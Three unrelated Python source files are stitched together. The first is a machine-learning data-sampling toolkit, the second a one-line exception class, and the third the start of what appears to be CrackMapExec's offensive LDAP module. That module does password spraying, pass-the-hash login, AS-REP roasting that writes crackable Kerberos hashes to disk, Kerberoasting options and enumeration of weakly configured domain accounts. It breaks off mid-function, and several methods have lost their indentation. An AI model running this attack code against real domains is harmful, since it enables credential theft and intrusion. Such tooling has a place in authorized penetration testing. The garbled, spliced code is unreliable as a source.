    sample_method : str, sampling method used in `cftool.misc.Sampler`
    * currently only 'multinomial' is supported
    verbose_imbalance : bool, whether to log when balancing kicks in
    verbose_level : int, verbose level used in `LoggingMixin`

    Examples
    ----------
    >>> import numpy as np
    >>>
    >>> from cfdata.types import np_int_type
    >>> from cfdata.tabular import TabularData
    >>> from cfdata.tabular.toolkit import ImbalancedSampler
    >>> from cftool.misc import get_counter_from_arr
    >>>
    >>> n = 20
    >>> x = np.arange(2 * n).reshape([n, 2])
    >>> # create an imbalance dataset
    >>> y = np.zeros([n, 1], np_int_type)
    >>> y[-1] = [1]
    >>> data = TabularData().read(x, y)
    >>> sampler = ImbalancedSampler(data)
    >>> # Counter({1: 12, 0: 8})
    >>> # This may vary, but will be rather balanced
    >>> # You might notice that positive samples are even more than negative samples!
    >>> print(get_counter_from_arr(y[sampler.get_indices()]))
    """

    def __init__(
        self,
        data: TabularData,
        imbalance_threshold: float = 0.1,
        *,
        shuffle: bool = True,
        aggregation: str = "continuous",
        aggregation_config: Optional[Dict[str, Any]] = None,
        sample_weights: Optional[np.ndarray] = None,
        sample_method: str = "multinomial",
        verbose_imbalance: bool = True,
        verbose_level: int = 2,
    ):
        self.data = data
        self.shuffle = shuffle
        self.imbalance_threshold = imbalance_threshold
        # Runtime switch (see switch_imbalance_status); starts enabled.
        self._sample_imbalance_flag = True
        # Kept so copy() can clone this sampler with identical settings.
        self._aggregation_name = aggregation
        self._aggregation_config = aggregation_config
        if not data.is_ts:
            # Plain tabular data: no aggregation, one index per row.
            self.aggregation = None
            self._num_samples = len(data)
        else:
            # Time-series data: samples are aggregated windows, so the
            # effective sample count comes from the aggregation.
            if aggregation_config is None:
                aggregation_config = {}
            base = aggregation_dict[aggregation]
            self.aggregation = base(data, aggregation_config, data._verbose_level)
            self._num_samples = len(self.aggregation.indices2id)
        if sample_weights is not None:
            # Explicit weights: normalize them and build the sampler
            # directly, skipping all label-based balancing below.
            label_counts = None
            self.sample_weights = sample_weights.copy()
            self.sample_weights /= self.sample_weights.sum() + 1e-8
            self._sampler = Sampler(sample_method, self.sample_weights)
        else:
            self.sample_weights = None
            if not self.shuffle or data.is_reg:
                # No shuffling requested, or regression task: balancing
                # by label makes no sense, so disable the sampler.
                label_counts = self._label_ratios = self._sampler = None
            else:
                label_recognizer = data.recognizers[-1]
                if label_recognizer is None:
                    raise ValueError(
                        "`data` should contain label recognizer "
                        "for `ImbalancedSampler`"
                    )
                # Map raw label values to their transformed ids, then
                # count samples per (sorted) transformed label.
                label_counter = label_recognizer.counter
                transform_dict = label_recognizer.transform_dict
                new_counter = {transform_dict[k]: v for k, v in label_counter.items()}
                counts_list = [new_counter[k] for k in sorted(new_counter)]
                label_counts = np.array(counts_list, np_float_type)
                self._label_ratios = label_counts / self._num_samples
                max_label_count = label_counts.max()
                if label_counts.min() / max_label_count >= imbalance_threshold:
                    # Balanced enough: plain shuffling will do.
                    self._sampler = None
                else:
                    processed = data.processed
                    if processed is None:
                        raise ValueError(
                            "`data` should contain `processed` "
                            "for `ImbalancedSampler`"
                        )
                    if not isinstance(processed.y, np.ndarray):
                        raise ValueError(
                            "`data` should contain `processed.y` "
                            "for `ImbalancedSampler`"
                        )
                    # Weight each sample inversely to its class frequency
                    # so rare classes get oversampled.
                    labels = processed.y.ravel()
                    sample_weights = np.zeros(self._num_samples, np_float_type)
                    for i, count in enumerate(label_counts):
                        sample_weights[labels == i] = max_label_count / count
                    sample_weights /= sample_weights.sum() + 1e-8
                    self._sampler = Sampler(sample_method, sample_weights)
        self._sample_method = sample_method
        self._verbose_level = verbose_level
        if label_counts is not None and verbose_imbalance:
            if self._sampler is not None:
                self.log_msg(
                    "using imbalanced sampler with "
                    f"label counts = {label_counts.tolist()}",
                    self.info_prefix,
                    2,
                )

    def __len__(self) -> int:
        # Number of (possibly aggregated) samples this sampler draws from.
        return self._num_samples

    @property
    def is_imbalance(self) -> bool:
        """Whether a balancing sampler was built for this dataset."""
        return self._sampler is not None

    @property
    def sample_imbalance(self) -> bool:
        """Whether balanced sampling is currently switched on."""
        return self._sample_imbalance_flag

    @property
    def label_ratios(self) -> Optional[np.ndarray]:
        """Per-class sample ratios, or None when not computed."""
        return self._label_ratios

    def switch_imbalance_status(self, flag: bool) -> None:
        """Enable/disable balanced sampling at runtime."""
        self._sample_imbalance_flag = flag

    def get_indices(self) -> np.ndarray:
        """Return one epoch worth of sample indices.

        Uses the balancing sampler when enabled and needed; otherwise
        plain (optionally shuffled) sequential indices. For time-series
        data the indices are finally expanded by the aggregation.
        """
        if not self.shuffle or not self._sample_imbalance_flag or not self.is_imbalance:
            indices = np.arange(self._num_samples).astype(np_int_type)
        else:
            if self._sampler is None:
                raise ValueError("`_sampler` is not yet generated")
            indices = self._sampler.sample(self._num_samples)
        if self.shuffle:
            np.random.shuffle(indices)
        if self.aggregation is not None:
            indices = self.aggregation.aggregate(indices)
        return indices

    def copy(self) -> "ImbalancedSampler":
        """Return a new sampler configured identically to this one.

        Mutable config/weights are copied; `verbose_imbalance` is forced
        off so the clone does not re-log the imbalance message.
        """
        aggregation_config = None
        if self._aggregation_config is not None:
            aggregation_config = shallow_copy_dict(self._aggregation_config)
        sample_weights = None
        if self.sample_weights is not None:
            sample_weights = self.sample_weights.copy()
        return ImbalancedSampler(
            self.data,
            self.imbalance_threshold,
            shuffle=self.shuffle,
            aggregation=self._aggregation_name,
            aggregation_config=aggregation_config,
            sample_weights=sample_weights,
            sample_method=self._sample_method,
            verbose_level=self._verbose_level,
            verbose_imbalance=False,
        )
class DataLoader:
    """
    Util class which can generated batches from `ImbalancedSampler`

    Examples
    ----------
    >>> import numpy as np
    >>>
    >>> from cfdata.types import np_int_type
    >>> from cfdata.tabular import TabularData
    >>> from cfdata.tabular.toolkit import DataLoader, ImbalancedSampler
    >>> from cftool.misc import get_counter_from_arr
    >>>
    >>> n = 20
    >>> x = np.arange(2 * n).reshape([n, 2])
    >>> y = np.zeros([n, 1], np_int_type)
    >>> y[-1] = [1]
    >>> data = TabularData().read(x, y)
    >>> sampler = ImbalancedSampler(data)
    >>> loader = DataLoader(16, sampler)
    >>> y_batches = []
    >>> for x_batch, y_batch in loader:
    >>>     y_batches.append(y_batch)
    >>>     # (16, 1) (16, 1)
    >>>     # (4, 1) (4, 1)
    >>>     print(x_batch.shape, y_batch.shape)
    >>> # Counter({1: 11, 0: 9})
    >>> print(get_counter_from_arr(np.vstack(y_batches).ravel()))
    """

    def __init__(
        self,
        batch_size: int,
        sampler: ImbalancedSampler,
        *,
        return_indices: bool = False,
        label_collator: Optional[Callable[[np.ndarray], np.ndarray]] = None,
        verbose_level: int = 2,
    ):
        self._cursor: int
        self._indices_in_use = None
        self._verbose_level = verbose_level
        self.data = sampler.data
        self.sampler = sampler
        self.return_indices = return_indices
        self._label_collator = label_collator
        self._num_samples = len(sampler)
        # Never ask for more samples than the sampler can provide.
        self.batch_size = min(self._num_samples, batch_size)

    def __len__(self) -> int:
        # Number of batches per epoch: ceil(num_samples / batch_size).
        # FIX: the previous `int(self._num_samples / self.batch_size)` used
        # float division, which can round incorrectly for very large
        # counts; integer `divmod` is exact.
        full, remainder = divmod(self._num_samples, self.batch_size)
        return full + bool(remainder)

    def __iter__(self) -> "DataLoader":
        self._reset()
        return self

    def __next__(self) -> batch_type:
        """Return the next batch, applying the label collator if any."""
        data_next = self._get_next_batch()
        if self.return_indices:
            (x_batch, y_batch), indices = data_next
        else:
            indices = None
            x_batch, y_batch = data_next
        if self._label_collator is not None:
            y_batch = self._label_collator(y_batch)
        batch = x_batch, y_batch
        if not self.return_indices:
            return batch
        return batch, indices

    @property
    def enabled_sampling(self) -> bool:
        """Whether the underlying sampler currently balances classes."""
        return self.sampler.sample_imbalance

    @enabled_sampling.setter
    def enabled_sampling(self, value: bool) -> None:
        self.sampler.switch_imbalance_status(value)

    def _reset(self) -> None:
        # Draw a fresh epoch of indices and rewind the cursor.
        self._cursor = -1
        self._indices_in_use = self.sampler.get_indices()

    def _get_next_batch(self) -> batch_type:
        """Slice the next `batch_size` indices and fetch their data."""
        n_iter, self._cursor = len(self), self._cursor + 1
        if self._cursor == n_iter:
            raise StopIteration
        if self._indices_in_use is None:
            raise ValueError("`_indices_in_use` is not yet generated")
        start = self._cursor * self.batch_size
        end = start + self.batch_size
        indices = self._indices_in_use[start:end]
        batch = self.data[indices]
        if not self.return_indices:
            return batch
        return batch, indices

    def _check_full_batch(self, data_item: data_item_type) -> bool:
        """Whether `data_item` holds exactly `batch_size` samples."""
        return len(data_item[0]) == self.batch_size

    def copy(self) -> "DataLoader":
        """Return a new loader over a copy of the sampler."""
        return DataLoader(
            self.batch_size,
            self.sampler.copy(),
            return_indices=self.return_indices,
            label_collator=self._label_collator,
            verbose_level=self._verbose_level,
        )
# time series
# Registry mapping aggregation names to their implementing classes;
# presumably populated via `register_core` by AggregationBase
# subclasses — TODO confirm (registration code is not in this chunk).
aggregation_dict: Dict[str, Type["AggregationBase"]] = {}
class AggregationBase(LoggingMixin, metaclass=ABCMeta):
    def __init__(self, data: TabularData, config: Dict[str, Any], verbose_level: int):
        """Validate the time-series data and build the per-id index tables.

        Parameters
        ----------
        data : TabularData, must be time-series (`data.is_ts`)
        config : dict, aggregation options; `num_history` (default 1) is
            the window length read here
        verbose_level : int, verbosity for `LoggingMixin`

        Raises
        ------
        ValueError
            If `data` is not time-series, or lacks `raw`, `raw.xT`,
            `ts_config`, or `ts_config.id_column_idx`.
        """
        if not data.is_ts:
            raise ValueError("time series data is required")
        self.data = data
        self.config = config
        self._verbose_level = verbose_level
        self._num_history = config.setdefault("num_history", 1)
        raw = data.raw
        if raw is None:
            raise ValueError("`data` need to contain `raw` for `AggregationBase`")
        if raw.xT is None:
            raise ValueError("`data` need to contain `raw.xT` for `AggregationBase`")
        if data.ts_config is None:
            raise ValueError("`data` need to contain `ts_config` for `AggregationBase`")
        id_column_idx = data.ts_config.id_column_idx
        if id_column_idx is None:
            msg = "`ts_config` need to contain `id_column_idx` for `AggregationBase`"
            raise ValueError(msg)
        # Group the (time-sorted) rows by their series id: `_unique_id_arr`
        # holds the distinct ids, `_id2indices` the row indices per id.
        id_column = raw.xT[id_column_idx]
        sorted_id_column = [id_column[i] for i in data.ts_sorting_indices]
        unique_indices = get_unique_indices(np.array(sorted_id_column))
        self.indices2id: np.ndarray
        self._unique_id_arr = unique_indices.unique
        self._id2indices = unique_indices.split_indices
        self._initialize()
    @property
    @abstractmethod
    def num_aggregation(self) -> int:
        """Window size of one aggregated sample (subclass-defined); used
        as the middle dimension when reshaping aggregated features."""
        pass
    @abstractmethod
    def _aggregate_core(self, indices: np.ndarray) -> np.ndarray:
        """Expand sampler indices into aggregated windows (subclass-defined).

        `indices` should be a column vector.
        """
    def _initialize(self) -> None:
        """Build per-id sample counts and the valid-index bookkeeping.

        An id is "valid" when it has at least `num_history` samples;
        ids with fewer samples are reported and effectively dropped
        (they yield no valid windows).

        Raises
        ------
        ValueError
            When no id has enough samples for the configured history.
        """
        num_list = list(map(len, self._id2indices))
        self._num_samples_per_id = np.array(num_list, np_int_type)
        self.log_msg("generating valid aggregation info", self.info_prefix, 5)
        valid_mask = self._num_samples_per_id >= self._num_history
        if not valid_mask.any():
            raise ValueError(
                "current settings lead to empty valid dataset, "
                "increasing raw dataset size or decreasing n_history "
                f"(current: {self._num_history}) might help"
            )
        if not valid_mask.all():
            # Report which ids are dropped and how many samples they held.
            invalid_mask = ~valid_mask
            n_invalid_id = invalid_mask.sum()
            n_invalid_samples = self._num_samples_per_id[invalid_mask].sum()
            self.log_msg(
                f"{n_invalid_id} id (with {n_invalid_samples} samples) "
                f"will be dropped (n_history={self._num_history})",
                self.info_prefix,
                verbose_level=2,
            )
            invalid_ids = self._unique_id_arr[invalid_mask].tolist()
            self.log_msg(
                f"dropped id : {', '.join(map(str, invalid_ids))}",
                self.info_prefix,
                verbose_level=4,
            )
        # Exclusive prefix sums: starting offset of each id's samples in
        # the stacked index array.
        self._num_samples_per_id_cumsum = np.hstack(
            [[0], np.cumsum(self._num_samples_per_id[:-1])]
        )
        # self._id2indices need to contain 'redundant' indices here because
        # aggregation need to aggregate those 'invalid' samples
        self._id2indices_stack = np.hstack(self._id2indices)
        self.log_msg(
            "generating aggregation attributes",
            self.info_prefix,
            verbose_level=5,
        )
        self._get_id2valid_indices()
        self._inject_valid_samples_info()
def _inject_valid_samples_info(self) -> None:
# 'indices' in self.indices2id here doesn't refer to indices of original dataset
# (e.g. 'indices' in self._id2indices), but refers to indices generated by sampler,
# so we should only care 'valid' indices here
self._num_valid_samples_per_id = list(map(len, self._id2valid_indices))
self._num_valid_samples_per_id_cumsum = np.hstack(
[[0], np.cumsum(self._num_valid_samples_per_id[:-1])]
)
num_int = self._num_valid_samples_per_id_cumsum.astype(np_int_type)
self._num_valid_samples_per_id_cumsum = num_int
arange = np.arange(len(self._unique_id_arr))
self.indices2id = np.repeat(arange, self._num_valid_samples_per_id)
self._id2valid_indices_stack = np.hstack(self._id2valid_indices)
    def _get_id2valid_indices(self) -> None:
        """Compute, per unique id, the 'valid' window-start indices.

        A window start is valid when `_num_history` consecutive samples are
        available within the id's block and the aggregated features / labels
        pass the nan checks below.
        """
        # TODO : support nan_fill here
        # NOTE(review): nan_fill is read but not used yet (see TODO above)
        nan_fill = self.config.setdefault("nan_fill", "past")
        nan_ratio = self.config.setdefault("nan_ratio", 0.0)
        # initial candidates: every window start leaving room for
        # `_num_history` samples inside this id's block
        self._id2valid_indices = [
            np.array([], np_int_type)
            if len(indices) < self._num_history
            else np.arange(
                cumsum, cumsum + len(indices) - self._num_history + 1
            ).astype(np_int_type)
            for cumsum, indices in zip(
                self._num_samples_per_id_cumsum, self._id2indices
            )
        ]
        # inject preliminary info so `aggregate` below can run
        self._inject_valid_samples_info()
        processed = self.data.processed
        if processed is None:
            raise ValueError("`processed` is not generated yet")
        x, y = processed.xy
        assert isinstance(x, np.ndarray)
        feature_dim = self.data.processed_dim
        for i, valid_indices in enumerate(self._id2valid_indices):
            cumsum = self._num_valid_samples_per_id_cumsum[i]
            arange = np.arange(cumsum, cumsum + len(valid_indices))
            aggregated_flat_indices = self.aggregate(arange).ravel()
            aggregated_x = x[aggregated_flat_indices]
            shape = [-1, self.num_aggregation, feature_dim]
            aggregated_x = aggregated_x.reshape(shape)
            aggregated_x_nan_mask = np.isnan(aggregated_x)
            if y is None:
                aggregated_y_valid_mask = None
            else:
                # the label of a window comes from its last sample
                aggregated_y = y[self.get_last_indices(aggregated_flat_indices)]
                aggregated_y_valid_mask = ~np.isnan(aggregated_y)
            # drop windows whose feature nan ratio exceeds `nan_ratio`,
            # and windows whose label is nan
            aggregated_nan_ratio = aggregated_x_nan_mask.mean((1, 2))
            valid_mask = aggregated_nan_ratio <= nan_ratio
            if aggregated_y_valid_mask is not None:
                valid_mask &= aggregated_y_valid_mask.ravel()
            new_valid_indices = valid_indices[valid_mask]
            self._id2valid_indices[i] = new_valid_indices
    def aggregate(self, indices: np.ndarray) -> np.ndarray:
        """Translate sampler indices into aggregated 'original' indices.

        Two groups of indices are maintained in `_initialize`:
        * the 'original' indices, which point into the original dataset
        * the 'valid' indices, which are 'virtual' and point into the
          'original' indices
        So sampler indices are translated to 'valid' indices, offsets are
        added to them (`_aggregate_core` does this), and the results are
        mapped back through the 'original' indices and the time-series
        sorting order to fetch the corresponding data.

        Parameters
        ----------
        indices : np.ndarray, indices coming from the sampler

        Returns
        -------
        indices : np.ndarray, aggregated 'original' indices with shape
            [len(indices), num_aggregation]

        """
        valid_indices = self._id2valid_indices_stack[indices]
        aggregated_valid_indices_mat = self._aggregate_core(valid_indices[..., None])
        aggregated = self._id2indices_stack[aggregated_valid_indices_mat.ravel()]
        reversed_aggregated = self.data.ts_sorting_indices[aggregated]
        return reversed_aggregated.reshape([-1, self.num_aggregation])
def get_last_indices(self, aggregated_flat_indices: np.ndarray) -> np.ndarray:
reshaped = aggregated_flat_indices.reshape([-1, self.num_aggregation])
return reshaped[..., -1]
    @classmethod
    def register(cls, name: str) -> Callable[[Type], Type]:
        """Class-decorator factory: register a subclass under `name` in the
        module-level `aggregation_dict`."""
        global aggregation_dict
        return register_core(name, aggregation_dict)
@AggregationBase.register("continuous")
class ContinuousAggregation(AggregationBase):
    """Aggregation using `_num_history` consecutive samples per window."""
    def _initialize(self) -> None:
        # cache the [0, 1, ..., n_history-1] offsets used by _aggregate_core
        self._history_arange = np.arange(self._num_history)
        super()._initialize()
    @property
    def num_aggregation(self) -> int:
        # each aggregated row holds `_num_history` consecutive samples
        return self._num_history
    def _aggregate_core(self, indices: np.ndarray) -> np.ndarray:
        # `indices` is a column vector; broadcasting against the cached
        # offsets yields one row of consecutive indices per input index
        return indices + self._history_arange
# Public API of this module: samplers, the data loader, and the
# aggregation registry / base class.
__all__ = [
    "KFold",
    "KRandom",
    "KBootstrap",
    "ImbalancedSampler",
    "DataLoader",
    "aggregation_dict",
    "AggregationBase",
]
|
class PSPException(Exception):
    """Project-specific exception type (semantics defined by call sites)."""
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from binascii import b2a_hex, unhexlify, hexlify
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
# Map of Windows/LDAP bind error sub-codes (as they appear in the error
# string returned by the server) to human-readable status names for logging.
ldap_error_status = {
    "533":"STATUS_ACCOUNT_DISABLED",
    "701":"STATUS_ACCOUNT_EXPIRED",
    "531":"STATUS_ACCOUNT_RESTRICTION",
    "530":"STATUS_INVALID_LOGON_HOURS",
    "532":"STATUS_PASSWORD_EXPIRED",
    "773":"STATUS_PASSWORD_MUST_CHANGE",
    "775":"USER_ACCOUNT_LOCKED",
    "50":"LDAP_INSUFFICIENT_ACCESS"
}
class ldap(connection):
    """LDAP protocol implementation: fingerprints the host over SMB first,
    then authenticates via LDAP/LDAPS."""
    def __init__(self, args, db, host):
        # connection / authentication state, filled in by the login methods
        self.domain = None
        self.server_os = None
        self.os_arch = 0
        self.hash = None
        self.ldapConnection = None
        self.lmhash = ''
        self.nthash = ''
        self.baseDN = ''
        self.remote_ops = None
        self.bootkey = None
        self.output_filename = None
        self.smbv1 = None
        self.signing = False
        # NOTE(review): smb_share_name comes from the star import of
        # cme.connection — confirm it is defined there
        self.smb_share_name = smb_share_name
        self.admin_privs = False
        connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using LDAP", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
    def proto_logger(self):
        """Set up the logger; starts as SMB/445 because host fingerprinting
        happens over SMB — the login methods switch `extra` to LDAP/LDAPS."""
        self.logger = CMEAdapter(extra={
            'protocol': "SMB",
            'host': self.host,
            'port': "445",
            'hostname': self.hostname
        })
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
    def enum_host_info(self):
        """Fingerprint the target over SMB (domain, hostname, OS, signing,
        arch), then re-create the connection object."""
        self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
        try:
            # anonymous/null session — enough to query server info
            self.conn.login('' , '')
        except:
            #if "STATUS_ACCESS_DENIED" in e:
            pass
        self.domain = self.conn.getServerDNSDomainName()
        self.hostname = self.conn.getServerName()
        self.server_os = self.conn.getServerOS()
        # SMBv1 exposes signing directly; SMBv2/3 keeps it in the negotiated
        # connection state
        self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
        self.os_arch = self.get_os_arch()
        self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
        if not self.domain:
            self.domain = self.hostname
        try:
            '''plaintext_login
            DC's seem to want us to logoff first, windows workstations sometimes reset the connection
            (go home Windows, you're drunk)
            '''
            self.conn.logoff()
        except:
            pass
        # CLI overrides for the detected domain
        if self.args.domain:
            self.domain = self.args.domain
        if self.args.local_auth:
            self.domain = self.hostname
        #Re-connect since we logged off
        self.create_conn_obj()
    def print_host_info(self):
        """Log a one-line summary of the fingerprinted host; returns True."""
        self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
                                                                                      ' x{}'.format(self.os_arch) if self.os_arch else '',
                                                                                      self.hostname,
                                                                                      self.domain,
                                                                                      self.signing,
                                                                                      self.smbv1))
        return True
def kerberos_login(self, domain, aesKey, kdcHost):
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
self.kdcHost = self.domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
nthash,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
    def create_smbv1_conn(self):
        """Try to open an SMBv1 connection to the target on 445.

        Returns True on success, False on any failure; a reset connection
        usually means SMBv1 is disabled server-side.
        """
        try:
            self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
            self.smbv1 = True
        except socket.error as e:
            if str(e).find('Connection reset by peer') != -1:
                logging.debug('SMBv1 might be disabled on {}'.format(self.host))
            return False
        except Exception as e:
            logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
            return False
        return True
    def create_smbv3_conn(self):
        """Try to open an SMBv2/3 connection (dialect negotiated) on 445.

        Returns True on success, False on any failure.
        """
        try:
